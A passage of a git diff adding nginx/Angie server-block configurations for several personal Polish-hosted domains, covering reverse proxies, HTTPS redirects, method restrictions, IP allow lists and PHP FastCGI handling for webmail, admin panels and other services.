$remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto https; + proxy_pass http://127.0.0.1:8000; + + proxy_request_buffering off; + client_body_timeout 120s; + proxy_read_timeout 120s; + proxy_connect_timeout 120s; + proxy_send_timeout 120s; + proxy_http_version 1.1; + + error_page 404 = @redirect_check; + } + + location @redirect_check { + add_header Cache-Control "no-cache, max-age=0, no-store"; + set_real_ip_from 127.0.0.1; + real_ip_header X-Forwarded-For; + + proxy_pass http://127.0.0.1:8282; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + } + + # Endpointy bez cache + location ~ ^/(stats|user-info|health)$ { + add_header Cache-Control "no-cache, max-age=0, no-store"; + proxy_cache off; + proxy_pass http://127.0.0.1:8282; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + } + + # Pliki RBL z lokalnego root + location ~ ^/(id-rbl\.txt|domain-rbl\.txt)$ { + add_header Cache-Control "no-cache, no-store"; + root /var/www/www.linuxiarz.pl; + try_files $uri =404; + } + + # Stały redirect do osobnej subdomeny + location /listapp/ { + return 301 https://listapp.linuxiarz.pl$request_uri; + } + + # PHP przez FastCGI + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} diff --git a/sites-available/listapp.linuxiarz.pl.conf b/sites-available/listapp.linuxiarz.pl.conf new file mode 100644 index 0000000..dea4a63 --- /dev/null +++ b/sites-available/listapp.linuxiarz.pl.conf @@ -0,0 +1,60 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + listen 80; + + server_name listapp.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/angie/listapp.linuxiarz.pl.access.log main; + error_log /var/log/angie/listapp.linuxiarz.pl.error.log warn; + + if ($request_method !~ ^(GET|HEAD)$) { + return '405'; + } + + if ($scheme = 'http') { + return 301 https://listapp.linuxiarz.pl$request_uri; + } + + location / { + proxy_pass http://127.0.0.1:6081/; + + proxy_http_version 1.1; + proxy_cache_bypass $http_upgrade; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-Port $server_port; + proxy_connect_timeout 300; + proxy_send_timeout 300; + proxy_read_timeout 300; + send_timeout 300; + + } + +} + +server { + listen 8080; + server_name listapp.linuxiarz.pl; + + location / { + proxy_pass http://127.0.0.1:8283; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto https; + } +} diff --git a/sites-available/nginx.linuxiarz.pl.conf b/sites-available/nginx.linuxiarz.pl.conf new file mode 100644 index 0000000..6afa5d2 --- /dev/null +++ b/sites-available/nginx.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name nginx.linuxiarz.pl; + set $base /var/www/nginx.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name nginx.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://nginx.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/pa.linuxiarz.pl.conf b/sites-available/pa.linuxiarz.pl.conf new file mode 100644 index 0000000..bba10e1 --- /dev/null +++ b/sites-available/pa.linuxiarz.pl.conf @@ -0,0 +1,55 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pa.linuxiarz.pl; + set $base /var/www/postfixadmin; +# set $base /var/www/postfixadmin-postfixadmin-cc23eba; + root $base/public; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/pa.linuxiarz.pl.access.log; + error_log /var/log/nginx/pa.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ login.php; + } + + # additional config + include config/general.conf; + + # handle .php + location ~* \.php$ { + include config/php_fastcgi7_4.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name pa.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://pa.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/paste.linuxiarz.pl.conf b/sites-available/paste.linuxiarz.pl.conf new file mode 100644 index 0000000..e71ced4 --- /dev/null +++ b/sites-available/paste.linuxiarz.pl.conf @@ -0,0 +1,52 @@ +server { + listen 443 ssl http2; + server_name paste.linuxiarz.pl; + set $base /var/www/paste.linuxiarz.pl; + root $base; + + include config/wildcard.conf; + + # security +# include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/paste.linuxiarz.pl.access.log; + error_log /var/log/nginx/paste.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri /index.php; + } + + if ($request_uri !~* ^/(static|favicon\.ico|robots\.txt)) { + rewrite ^/(.*)$ /index.php?/$1 last; + break; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { +# include config/php_fastcgi.conf; + include config/php_fastcgi8_1.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name paste.linuxiarz.pl; + + location / { + return 301 https://paste.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/paste.linuxiarz.pl_varnish.conf b/sites-available/paste.linuxiarz.pl_varnish.conf new file mode 100644 index 0000000..ef5202e --- /dev/null +++ b/sites-available/paste.linuxiarz.pl_varnish.conf @@ -0,0 +1,72 @@ +server { + listen 8080; + server_name paste.linuxiarz.pl; + set $base /var/www/paste.linuxiarz.pl; + root $base; + + # security + include config/security_paste.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri /index.php; + } + + if ($request_uri !~* ^/(static|favicon\.ico|robots\.txt)) { + rewrite ^/(.*)$ /index.php?/$1 last; + break; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi7_4.conf; + } +} + + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name paste.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/nginx/paste.linuxiarz.pl.access.log; + error_log /var/log/nginx/paste.linuxiarz.pl.error.log warn; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name paste.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://paste.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/pliki.linuxiarz.pl.conf b/sites-available/pliki.linuxiarz.pl.conf new file mode 100644 index 0000000..77253ef --- /dev/null +++ b/sites-available/pliki.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pliki.linuxiarz.pl; + set $base /var/www/linuxiarz.pl/pliki; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name pliki.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://pliki.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/pma.linuxiarz.pl.conf b/sites-available/pma.linuxiarz.pl.conf new file mode 100644 index 0000000..908e49f --- /dev/null +++ b/sites-available/pma.linuxiarz.pl.conf @@ -0,0 +1,56 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pma.linuxiarz.pl; + set $base /var/www/pma.linuxiarz.pl/pma; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/pma.linuxiarz.pl.access.log; + error_log /var/log/nginx/pma.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { +# allow 85.221.250.77/32; + allow 85.221.250.159/32; + deny all; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name pma.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://pma.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/quarantine.linuxiarz.pl.conf b/sites-available/quarantine.linuxiarz.pl.conf new file mode 100644 index 0000000..399f300 --- /dev/null +++ b/sites-available/quarantine.linuxiarz.pl.conf @@ -0,0 +1,44 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name quarantine.linuxiarz.pl; + + include config/wildcard.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + + include uwsgi_params; + uwsgi_pass 127.0.0.1:9000; + + allow 85.221.253.162; + allow 127.0.0.1; + deny all; + } + +} + +# HTTP redirect +server { + listen 80; + server_name quarantine.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://quarantine.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/r.linuxiarz.pl.conf b/sites-available/r.linuxiarz.pl.conf new file mode 100644 index 0000000..48959f2 --- /dev/null +++ b/sites-available/r.linuxiarz.pl.conf @@ -0,0 +1,66 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name r.linuxiarz.pl; + set $base /var/www/rainloop; + root $base; + + include config/wildcard.conf; + include config/security_roundcube.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/r.linuxiarz.pl.access.log; + error_log /var/log/nginx/r.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(data)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name r.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://r.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/redirects.conf b/sites-available/redirects.conf new file mode 100644 index 0000000..70dc9fa --- /dev/null +++ b/sites-available/redirects.conf @@ -0,0 +1,17 @@ +server { + listen 80; + server_name .gru.one.pl ; + + location / { + return 301 https://www.linuxiarz.pl$request_uri; + } +} + +server { + listen 80; + server_name .grucha.eu.org; + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-available/repo.linuxiarz.pl.conf b/sites-available/repo.linuxiarz.pl.conf new file mode 100644 index 0000000..d2a7581 --- /dev/null +++ b/sites-available/repo.linuxiarz.pl.conf @@ -0,0 +1,64 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name repo.linuxiarz.pl; + set $base /var/www/repo.linuxiarz.pl; + root $base; + + include config/wildcard.conf; + + index index.php; + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/repo.linuxiarz.pl.access.log; + error_log /var/log/nginx/repo.linuxiarz.pl.error.log warn; + + + location ~* \.(?:tar.gz|zip?)$ { + rewrite ^/(.*)$ https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frhsuwgawuyg/b/linuxiarz-repo/o/$1 permanent; + } + + + location / { +# try_files $uri $uri/ /index.php?dl=$uri; + try_files $uri $uri/ /index.php?$uri; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name repo.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://repo.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/rspamd.linuxiarz.pl.conf b/sites-available/rspamd.linuxiarz.pl.conf new file mode 100644 index 0000000..38a5789 --- /dev/null +++ b/sites-available/rspamd.linuxiarz.pl.conf @@ -0,0 +1,49 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name rspamd.linuxiarz.pl; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + proxy_pass http://127.0.0.1:11334/; + include config/proxy.conf; + } + + # additional config +# include config/general.conf; +} + +# HTTP redirect +server { + listen 80; + server_name rspamd.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://rspamd.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/sk.linuxiarz.pl.conf b/sites-available/sk.linuxiarz.pl.conf new file mode 100644 index 0000000..cb8f1bb --- /dev/null +++ b/sites-available/sk.linuxiarz.pl.conf @@ -0,0 +1,49 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name sk.linuxiarz.pl; + set $base /var/www/sk.linuxiarz.pl; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/sk.linuxiarz.pl.access.log; + error_log /var/log/nginx/sk.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi8_1.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name sk.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://sk.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/sogo.linuxiarz.pl.conf b/sites-available/sogo.linuxiarz.pl.conf new file mode 100644 index 0000000..7febe90 --- /dev/null +++ b/sites-available/sogo.linuxiarz.pl.conf @@ -0,0 +1,32 @@ +server { + listen 443 ssl http2; + server_name sogo.linuxiarz.pl; + + include config/wildcard.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/sogo.linuxiarz.pl.access.log; + error_log /var/log/nginx/sogo.linuxiarz.pl.error.log warn; + + # additional config +# include config/general.conf; +# include config/security.conf; + include config/sogo.conf; +} + +# HTTP redirect +server { + listen 80; +# listen [::]:80; + server_name sogo.linuxiarz.pl; + + location / { + return 301 https://sogo.linuxiarz.pl$request_uri; + } +} + diff --git a/sites-available/ts3stats.linuxiarz.pl.conf b/sites-available/ts3stats.linuxiarz.pl.conf new file mode 100644 index 0000000..0f44758 --- /dev/null +++ b/sites-available/ts3stats.linuxiarz.pl.conf @@ -0,0 +1,67 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name ts3stats.linuxiarz.pl; + set $base /var/www/ts3stats; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/ts3stats.linuxiarz.pl.access.log; + error_log /var/log/nginx/ts3stats.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + location / { + try_files $uri $uri/ /index.php; + } + + location /rrd { + rewrite ^ $scheme://$host permanent; + deny all; + } + + location ~ /graph { + allow all; + } + + location /libraries { + rewrite ^ $scheme://$host permanent; + deny all; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name ts3stats.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://ts3stats.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/unitraklub.pl.conf b/sites-available/unitraklub.pl.conf new file mode 100644 index 0000000..8cb87cd --- /dev/null +++ b/sites-available/unitraklub.pl.conf @@ -0,0 +1,32 @@ +server { + listen 80; + server_name *.unitraklub.pl unitraklub.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + root /var/www/503/; + index index.html; +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name *.unitraklub.pl unitraklub.pl; + + + ssl_certificate /etc/nginx/ssl/nginx.crt; + ssl_certificate_key /etc/nginx/ssl/nginx.key; + ssl_stapling off; + + root /var/www/503/; + index index.html; + +location / { + try_files /index.html =404; +} +} diff --git a/sites-available/webmail-beta.linuxiarz.pl.conf b/sites-available/webmail-beta.linuxiarz.pl.conf new file mode 100644 index 0000000..b402ec8 --- /dev/null +++ b/sites-available/webmail-beta.linuxiarz.pl.conf @@ -0,0 +1,60 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name webmail-beta.linuxiarz.pl; + set $base /var/www/webmail-beta; + root $base; + + include config/wildcard.conf; + include config/security_wp.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } + + # logging + access_log /var/log/nginx/webmail-beta.linuxiarz.pl.access.log; + error_log /var/log/nginx/webmail-beta.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location /x { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + diff --git a/sites-available/webmail.linuxiarz.pl.conf b/sites-available/webmail.linuxiarz.pl.conf new file mode 100644 index 0000000..7626e9c --- /dev/null +++ b/sites-available/webmail.linuxiarz.pl.conf @@ -0,0 +1,92 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name webmail.linuxiarz.pl; + set $base /var/www/webmail; + root $base; + + include config/wildcard.conf; + include config/security_roundcube.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/webmail.linuxiarz.pl.access.log; + error_log /var/log/nginx/webmail.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name webmail.linuxiarz.pl poczta.linuxiarz.pl poczta.gru.one.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} + +# Other redirects +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name poczta.linuxiarz.pl; + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/webmail.linuxiarz.pl_varnish.conf b/sites-available/webmail.linuxiarz.pl_varnish.conf new file mode 100644 index 0000000..62ab113 --- /dev/null +++ b/sites-available/webmail.linuxiarz.pl_varnish.conf @@ -0,0 +1,93 @@ +server { + listen 8080; + server_name webmail.linuxiarz.pl; + set $base /var/www/webmail; + root $base; + +# include config/security_roundcube.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config +# include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + + +server { + listen 443 ssl http2; + server_name webmail.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/nginx/webmail.linuxiarz.pl.access.log; + error_log /var/log/nginx/webmail.linuxiarz.pl.error.log warn; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + + +# HTTP redirect +server { + listen 80; +# listen [::]:80; + server_name webmail.linuxiarz.pl poczta.linuxiarz.pl poczta.gru.one.pl; + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} + +# Other redirects +server { + listen 443 ssl http2; + server_name poczta.linuxiarz.pl; + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/z.gruszczynski.eu.org_varnish.conf b/sites-available/z.gruszczynski.eu.org_varnish.conf new file mode 100644 index 0000000..56b0dd4 --- /dev/null +++ b/sites-available/z.gruszczynski.eu.org_varnish.conf @@ -0,0 +1,87 @@ +server { + listen 8080; + server_name z.gruszczynski.eu.org; + set $base /var/www/z.gruszczynski.eu.org; + root $base; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # index.php + index index.php; + + # additional config + include config/general.conf; + port_in_redirect off; + + location / { + } + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name z.gruszczynski.eu.org; + + access_log /var/log/nginx/z.gruszczynski.eu.org.access.log main; + error_log /var/log/nginx/z.gruszczynski.eu.org.error.log warn; + + ssl_certificate /etc/letsencrypt/live/z.gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/z.gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/z.gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + include config/letsencrypt.conf; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + add_header X-Robots-Tag "noindex, follow" always; + + } + + location = /robots.txt { + add_header Content-Type text/plain; + return 200 "User-agent: *\nDisallow: /\n"; + } + + + +} + +# HTTP redirect +server { + listen 80; + server_name z.gruszczynski.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://z.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-enabled/._linuxiarz.pl.conf b/sites-enabled/._linuxiarz.pl.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/sites-enabled/adphone.pl.conf b/sites-enabled/adphone.pl.conf new file mode 120000 index 0000000..ea4647d --- /dev/null +++ b/sites-enabled/adphone.pl.conf @@ -0,0 +1 @@ +../sites-available/adphone.pl.conf \ No newline at end of file diff --git a/sites-enabled/autodiscover.conf b/sites-enabled/autodiscover.conf new file mode 100644 index 0000000..493dab0 --- /dev/null +++ b/sites-enabled/autodiscover.conf @@ -0,0 +1,46 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name autodiscover.linuxiarz.pl autodiscover.gruszczynski.eu.org autodiscover.gru.one.pl autodiscover.szczepaniak.eu.org; + set $base /var/www/autodiscover; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # logging + access_log /var/log/angie/autodiscover.linuxiarz.pl.access.log; + error_log /var/log/angie/autodiscover.linuxiarz.pl.error.log warn; + + + location ~ /(?:a|A)utodiscover/(?:a|A)utodiscover.xml { + rewrite .* /autodiscover/autodiscover.php redirect; + } + + # additional config + include config/general.conf; + + # handle .php + location ~* \.php$ { + include config/php_fastcgi.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name autodiscover.linuxiarz.pl autodiscover.gruszczynski.eu.org autodiscover.gru.one.pl autodiscover.szczepaniak.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + location / { + return 301 https://autodiscover.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/blog.linuxiarz.pl.conf b/sites-enabled/blog.linuxiarz.pl.conf new file mode 120000 index 0000000..88f6a2b --- /dev/null +++ b/sites-enabled/blog.linuxiarz.pl.conf @@ -0,0 +1 @@ +../sites-available/blog.linuxiarz.pl.conf \ No newline at end of file diff --git a/sites-enabled/default.conf b/sites-enabled/default.conf new file mode 100644 index 0000000..fe8386d --- /dev/null +++ b/sites-enabled/default.conf @@ -0,0 +1,19 @@ +server { + listen 80 default_server ; + return 403; + if ($request_method !~ ^(HEAD)$) { + return '405'; + } +} + +server { + listen 443 ssl default_server; + return 403; + if ($request_method !~ ^(HEAD)$) { + return '405'; + } + + ssl_certificate /etc/angie/ssl/angie.crt; + ssl_certificate_key /etc/angie/ssl/angie.key; + ssl_stapling off; +} diff --git a/sites-enabled/doh.conf b/sites-enabled/doh.conf new file mode 100644 index 0000000..9a3650c --- /dev/null +++ b/sites-enabled/doh.conf @@ -0,0 +1,66 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + + server_name doh.linuxiarz.pl; + + set $base /var/www/dnsdist; + root $base; + + + include config/wildcard.conf; + 